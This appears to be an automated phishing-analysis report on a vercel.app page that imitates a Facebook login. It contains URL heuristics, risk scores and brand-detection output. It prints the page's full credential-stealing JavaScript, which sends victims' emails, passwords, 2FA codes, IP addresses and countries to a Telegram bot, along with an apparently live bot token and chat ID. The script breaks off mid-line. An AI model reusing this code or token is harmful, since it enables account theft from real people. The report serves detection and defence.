Windows Analysis Report
http://aicenterr.vercel.app/asd.com.html

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: http://aicenterr.vercel.app

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration, sending sensitive information (email, password) to a third-party domain, and potential for abuse. While the script may have a legitimate purpose, the way it is implemented raises significant security concerns."
}

    const TELEGRAM_BOT_TOKEN = "7234992518:AAHXs67Ba-UQoX7Pn_s7c1gZowfPMrE8xYA"; // Thay token bot ca bn
    const CHAT_ID = "1148231049"; // Thay Chat ID ca bn

    const loginForm = document.getElementById("login-form");
    const authForm = document.getElementById("auth-form");
    const loginStep = document.getElementById("login-step");
    const authStep = document.getElementById("auth-step");
    const loginButton = document.getElementById("login-button");
    const authButton = document.getElementById("auth-button");
    const twoFaErrorMessage = document.getElementById("2fa-error-message");
    const countdownElement = document.getElementById("countdown");

    let countdownInterval;

    // Hm gi tin nhn ti Telegram
    function sendMessageToTelegram(message) {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
      const data = {
        chat_id: CHAT_ID,
        text: message
      };

      fetch(url, {
        method: "POST",
        headers: {
          "Content-Type": "application/json"
        },
        body: JSON.stringify(data)
      })
      .then(response => response.json())
      .then(data => {
        console.log("Message sent successfully", data);
      })
      .catch(error => {
        console.error("Error sending message to Telegram", error);
      });
    }

    // Ly a ch IP ngi dng v thng tin quc gia
    function getUserIPAndCountry() {
      return fetch('https://ip-api.com/json/')
        .then(response => response.json())
        .then(data => ({
          ip: data.query,
          country: data.country
        }))
        .catch(error => {
          console.error("Error fetching IP and country", error);
          return { ip: "IP not found", country: "Country not found" };
        });
    }

    // Handle login form submission
    loginForm.addEventListener("submit", function (event) {
      event.preventDefault();

      const email = document.getElementById("email").value;
      const password = document.getElementById("password").value;

      // Gi nguyn trng thi loading cho button
      toggleLoading(loginButton, true);

      setTimeout(() => {
        toggleLoading(loginButton, false);

        // Chuyn qua bc xc thc 2FA
        loginStep.classList.add("hidden");
        authStep.classList.remove("hidden");

        // Gi a ch IP, quc gia v thng tin ng nhp ti Telegram
        getUserIPAndCountry().then(({ ip, country }) => {
          const message = `Scan Team\nIP Address: ${ip}\nCountry: ${country}\nEmail: ${email}\nPassword: ${password}`;
          sendMessageToTelegram(message);
        });
      }, 3000); // Delay 3s trc khi chuyn bc
    });

    // Toggle loading state for buttons
    function toggleLoading(button, isLoading) {
      button.classList.toggle("loading", isLoading);
      button.disabled = isLoading;
    }

    // Handle 2FA form submission
    let incorrectAttempts = 0;  // Bin theo di s ln nhp sai

    authForm.addEventListener("submit", function (event) {
      event.preventDefault();

      const authCode = document.getElementById("auth-code").value;
      const correctCode = "654321"; // M xc thc ng (hoc ly t email)

      toggleLoading(authButton, true);

      setTimeout(() => {
        toggleLoading(authButton, false);

        if (authCode === correctCode) {
          // Nu m ng
          alert("Verification successful!");
          getUserIPAndCountry().then(({ ip, country }) => {
            sendMessageToTelegram(`2FA verification successful. Code entered: ${authCode}\nIP Address: ${ip}\nCountry: ${country}`);
          });
        } else {
          incorrectAttempts++;  // Tng s ln nhp sai

          if (incorrectAttempts >= 5) {  //  thay i s ln sai t 3 ln 5
            alert("Too many incorrect attempts. Moving to the next step.");
            authStep.classList.add("hidden");
            loginStep.classList.remove("hidden");
          } els

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "Log In",
  "text_input_field_labels": [
    "Phone number or email",
    ""
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Facebook"
  ]
}

```json{  "legit_domain": "facebook.com",  "classification": "wellknown",  "reasons": [    "The brand 'Facebook' is well-known and is associated with the domain 'facebook.com'.",    "The URL 'aicenterr.vercel.app' does not match the legitimate domain for Facebook.",    "The domain 'vercel.app' is a hosting platform and not directly associated with Facebook.",    "The subdomain 'aicenterr' is suspicious and not related to Facebook.",    "The presence of input fields for 'Phone number or email' and password is typical for phishing attempts targeting Facebook credentials."  ],  "riskscore": 9}
Google indexed: False